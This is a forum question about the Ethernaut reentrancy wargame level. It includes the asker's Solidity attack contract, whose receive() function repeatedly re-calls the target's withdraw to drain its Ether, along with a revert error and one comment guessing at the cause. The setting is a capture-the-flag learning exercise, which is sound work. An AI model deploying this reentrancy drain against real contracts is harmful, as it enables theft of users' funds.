# Ethernaut Re-entrancy Challenge

Tags: solidity, reentrant-attacks

I am currently studying on Ethernaut challenges. I could not pass reentrancy section. I tried many times with different solutions, but somehow, transactions fail. Here is the code:

```
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

interface IReentrance {
    function donate(address _to) external payable;
    function withdraw(uint _amount) external;
}

contract ReentranceAttack {
    address public owner;
    IReentrance targetContract;
    uint targetValue = 1000000000000000;

    constructor(address _targetAddr) public {
        targetContract = IReentrance(_targetAddr);
        owner = msg.sender;
    }

    function balance() public view returns (uint) {
        return address(this).balance;
    }

    function donateAndWithdraw() public payable {
        require(msg.value >= targetValue, "no condition!");
        targetContract.donate.value(msg.value)(address(this));
        targetContract.withdraw(msg.value);
    }

    function withdrawAll() public returns (bool) {
        require(msg.sender == owner, "my money!!");
        uint totalBalance = address(this).balance;
        (bool sent, ) = msg.sender.call.value(totalBalance)("");
        require(sent, "Failed to send Ether");
        return sent;
    }

    receive() external payable {
        uint targetBalance = address(targetContract).balance;
        if (targetBalance >= targetValue) {
          targetContract.withdraw(targetValue);
        }
    }
}
```

It seems problem is related with 'require(msg.value >= targetValue, "no condition!");'. When I try to execute this function with lower msg.value, it gives the expected output; however, when i equal msg.value "1000000000000000", it throws the following error:

```
The transaction has been reverted to the initial state.
Note: The called function should be payable if you send value and the value you send should be less than your current balance.
Debug the transaction to get more information.
```

What i dont understand, the function is payable and even in vm, which accounts have 100 ether, i cannot execute the function as well as testnet. What can be the problem? Thanks in advance.

Comment: Most likely the transaction fails due to either of the calls to the `targetContract`.